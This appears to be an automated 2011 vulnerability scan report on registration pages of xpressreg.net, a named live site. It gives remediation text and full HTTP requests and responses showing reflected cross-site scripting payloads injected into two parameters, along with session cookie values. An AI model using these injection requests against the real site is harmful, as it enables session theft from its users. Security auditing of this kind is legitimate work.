XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, xpressreg.net

Report generated by XSS.CX at Wed Nov 09 06:18:40 CST 2011.

Loading



1. Cross-site scripting (reflected)

1.1. https://www.xpressreg.net/register/adte111/lookup.asp [sc parameter]

1.2. https://www.xpressreg.net/register/adte111/regInfo.asp [a parameter]

2. Cross-domain Referer leakage

2.1. https://www.xpressreg.net/register/adte111/lookup.asp

2.2. https://www.xpressreg.net/register/adte111/regInfo.asp

3. Cacheable HTTPS response

3.1. https://www.xpressreg.net/register/adte111/Answers.asp

3.2. https://www.xpressreg.net/register/adte111/includes/techinfo.asp

4. HTML does not specify charset

4.1. https://www.xpressreg.net/register/adte111/includes/techinfo.asp

4.2. https://www.xpressreg.net/register/adte111/lookup.asp

4.3. https://www.xpressreg.net/register/adte111/regInfo.asp



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.xpressreg.net/register/adte111/lookup.asp [sc parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/lookup.asp

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c184"><script>alert(1)</script>17759f1d17 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register/adte111/lookup.asp?sc=6c184"><script>alert(1)</script>17759f1d17&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://community.microsoftadvertising.com/blogs/advertiser/archive/2011/11/04/use-our-discount-code-for-200-off-a-full-conference-pass-for-ad-tech-new-york.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:37:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 11981
Content-Type: text/html
Expires: Sun, 06 Nov 2011 00:37:52 GMT
Cache-control: no-cache

<script src="js/jquery.js" type="text/javascript"></script>
<script src="js/jtip.js" type="text/javascript"></script>
<script src="includes/library.js" type="text/javascript"></script>

<!DOCTYPE
...[SNIP]...
<form name="Form1" action="lookup_p.asp?sc=6C184"><SCRIPT>ALERT(1)</SCRIPT>17759F1D17&p1=" method="post" onSubmit="return validate_all(Form1)">
...[SNIP]...

1.2. https://www.xpressreg.net/register/adte111/regInfo.asp [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/regInfo.asp

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d803d"><script>alert(1)</script>b7a5d4e3f80 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register/adte111/regInfo.asp?iq=&e5=&k=&st=1&o=100973&std=1&e10=&cm=34&e1=&a=d803d"><script>alert(1)</script>b7a5d4e3f80&sc=&t=hg546htk&aban= HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.xpressreg.net/register/adte111/lookup.asp?sc=&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban
Cookie: ASPSESSIONIDCQSQAQBR=MCMKBMCDIHMJOHBEONJJECEP; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3Dimediaadtechprod2%253D%252526pid%25253Dhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526abanhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526aban%252526oid%25253Dfunctionanonymous%25252528e%25252529%2525257Bvars%2525253Ds_c_il%2525255B0%2525255D%2525252Cb%2525253Ds.eh%25252528this%2525252C%25252522onclick%25252522%25252529%2525253Bs.lnk%2525253Ds.co%25252528this%25252529%2525253Bs.t%25252528%25252529%2525253Bs.lnk%2525253D0%2525253Bif%25252528b%25252529%2525257Bretu%252526oidt%25253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:41:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 30722
Content-Type: text/html
Expires: Sun, 06 Nov 2011 00:41:36 GMT
Cache-control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<link rel="stylesheet" href="/register/adte111/includes/
...[SNIP]...
<input type="hidden" name="association" value="d803d"><script>alert(1)</script>b7a5d4e3f80" />
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. https://www.xpressreg.net/register/adte111/lookup.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/lookup.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /register/adte111/lookup.asp?sc=&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://community.microsoftadvertising.com/blogs/advertiser/archive/2011/11/04/use-our-discount-code-for-200-off-a-full-conference-pass-for-ad-tech-new-york.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:37:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 11897
Content-Type: text/html
Expires: Sun, 06 Nov 2011 00:37:24 GMT
Cache-control: no-cache

<script src="js/jquery.js" type="text/javascript"></script>
<script src="js/jtip.js" type="text/javascript"></script>
<script src="includes/library.js" type="text/javascript"></script>

<!DOCTYPE
...[SNIP]...
<td align="left" height="70">
<img src="//seal.qualys.com/sealserv/seal.gif?i=46b5188b-b590-40ea-80d6-9c6b9676c71f" onclick="window.open('https://seal.qualys.com/sealserv/info/?i=46b5188b-b590-40ea-80d6-9c6b9676c71f','qualysSealInfo', 'height=600,width=851,resizable=1')" />
</td>
...[SNIP]...

2.2. https://www.xpressreg.net/register/adte111/regInfo.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/regInfo.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /register/adte111/regInfo.asp?iq=&e5=&k=&st=1&o=100973&std=1&e10=&cm=34&e1=&a=&sc=&t=hg546htk&aban= HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.xpressreg.net/register/adte111/lookup.asp?sc=&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban
Cookie: ASPSESSIONIDCQSQAQBR=MCMKBMCDIHMJOHBEONJJECEP; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3Dimediaadtechprod2%253D%252526pid%25253Dhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526abanhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526aban%252526oid%25253Dfunctionanonymous%25252528e%25252529%2525257Bvars%2525253Ds_c_il%2525255B0%2525255D%2525252Cb%2525253Ds.eh%25252528this%2525252C%25252522onclick%25252522%25252529%2525253Bs.lnk%2525253Ds.co%25252528this%25252529%2525253Bs.t%25252528%25252529%2525253Bs.lnk%2525253D0%2525253Bif%25252528b%25252529%2525257Bretu%252526oidt%25253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:40:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 30679
Content-Type: text/html
Expires: Sun, 06 Nov 2011 00:40:16 GMT
Cache-control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<link rel="stylesheet" href="/register/adte111/includes/
...[SNIP]...
<td align="left" height="70">
<img src="//seal.qualys.com/sealserv/seal.gif?i=46b5188b-b590-40ea-80d6-9c6b9676c71f" onclick="window.open('https://seal.qualys.com/sealserv/info/?i=46b5188b-b590-40ea-80d6-9c6b9676c71f','qualysSealInfo', 'height=600,width=851,resizable=1')" />
</td>
...[SNIP]...

3. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


3.1. https://www.xpressreg.net/register/adte111/Answers.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/Answers.asp

Request

GET /register/adte111/Answers.asp?width=200&question=2 HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.xpressreg.net/register/adte111/lookup.asp?sc=&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban
Cookie: ASPSESSIONIDCQSQAQBR=MCMKBMCDIHMJOHBEONJJECEP

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:38:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
   <title>Information</title>
</head>
<body onload=window.focus();>
<div align="center" class="whiteBG">
...[SNIP]...

3.2. https://www.xpressreg.net/register/adte111/includes/techinfo.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/includes/techinfo.asp

Request

GET /register/adte111/includes/techinfo.asp HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.xpressreg.net/register/adte111/lookup.asp?sc=&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban
Cookie: ASPSESSIONIDCQSQAQBR=MCMKBMCDIHMJOHBEONJJECEP; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3Dimediaadtechprod2%253D%252526pid%25253Dhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526abanhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526aban%252526oid%25253Dfunctionanonymous%25252528e%25252529%2525257Bvars%2525253Ds_c_il%2525255B0%2525255D%2525252Cb%2525253Ds.eh%25252528this%2525252C%25252522onclick%25252522%25252529%2525253Bs.lnk%2525253Ds.co%25252528this%25252529%2525253Bs.t%25252528%25252529%2525253Bs.lnk%2525253D0%2525253Bif%25252528b%25252529%2525257Bretu%252526oidt%25253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:39:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1133
Content-Type: text/html
Cache-control: private


<html>
<head>
<meta name="GENERATOR" Content="Microsoft Visual Studio.NET 7.0">
<link rel="stylesheet" href="registration.css" type="text/css">
<title>Technical Support</title>
</head>
<body
...[SNIP]...

4. HTML does not specify charset  previous
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


4.1. https://www.xpressreg.net/register/adte111/includes/techinfo.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/includes/techinfo.asp

Request

GET /register/adte111/includes/techinfo.asp HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.xpressreg.net/register/adte111/lookup.asp?sc=&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban
Cookie: ASPSESSIONIDCQSQAQBR=MCMKBMCDIHMJOHBEONJJECEP; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3Dimediaadtechprod2%253D%252526pid%25253Dhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526abanhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526aban%252526oid%25253Dfunctionanonymous%25252528e%25252529%2525257Bvars%2525253Ds_c_il%2525255B0%2525255D%2525252Cb%2525253Ds.eh%25252528this%2525252C%25252522onclick%25252522%25252529%2525253Bs.lnk%2525253Ds.co%25252528this%25252529%2525253Bs.t%25252528%25252529%2525253Bs.lnk%2525253D0%2525253Bif%25252528b%25252529%2525257Bretu%252526oidt%25253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:39:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1133
Content-Type: text/html
Cache-control: private


<html>
<head>
<meta name="GENERATOR" Content="Microsoft Visual Studio.NET 7.0">
<link rel="stylesheet" href="registration.css" type="text/css">
<title>Technical Support</title>
</head>
<body
...[SNIP]...

4.2. https://www.xpressreg.net/register/adte111/lookup.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/lookup.asp

Request

GET /register/adte111/lookup.asp?sc=&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://community.microsoftadvertising.com/blogs/advertiser/archive/2011/11/04/use-our-discount-code-for-200-off-a-full-conference-pass-for-ad-tech-new-york.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:37:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 11897
Content-Type: text/html
Expires: Sun, 06 Nov 2011 00:37:24 GMT
Cache-control: no-cache

<script src="js/jquery.js" type="text/javascript"></script>
<script src="js/jtip.js" type="text/javascript"></script>
<script src="includes/library.js" type="text/javascript"></script>

<!DOCTYPE
...[SNIP]...

4.3. https://www.xpressreg.net/register/adte111/regInfo.asp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xpressreg.net
Path:   /register/adte111/regInfo.asp

Request

GET /register/adte111/regInfo.asp?iq=&e5=&k=&st=1&o=100973&std=1&e10=&cm=34&e1=&a=&sc=&t=hg546htk&aban= HTTP/1.1
Host: www.xpressreg.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.xpressreg.net/register/adte111/lookup.asp?sc=&abanhttps://www.xpressreg.net/register/adte111/lookup.asp?sc=&aban
Cookie: ASPSESSIONIDCQSQAQBR=MCMKBMCDIHMJOHBEONJJECEP; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3Dimediaadtechprod2%253D%252526pid%25253Dhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526abanhttps%2525253A//www.xpressreg.net/register/adte111/lookup.asp%2525253Fsc%2525253D%25252526aban%252526oid%25253Dfunctionanonymous%25252528e%25252529%2525257Bvars%2525253Ds_c_il%2525255B0%2525255D%2525252Cb%2525253Ds.eh%25252528this%2525252C%25252522onclick%25252522%25252529%2525253Bs.lnk%2525253Ds.co%25252528this%25252529%2525253Bs.t%25252528%25252529%2525253Bs.lnk%2525253D0%2525253Bif%25252528b%25252529%2525257Bretu%252526oidt%25253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 01:40:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 30679
Content-Type: text/html
Expires: Sun, 06 Nov 2011 00:40:16 GMT
Cache-control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<link rel="stylesheet" href="/register/adte111/includes/
...[SNIP]...

Report generated by XSS.CX at Wed Nov 09 06:18:40 CST 2011.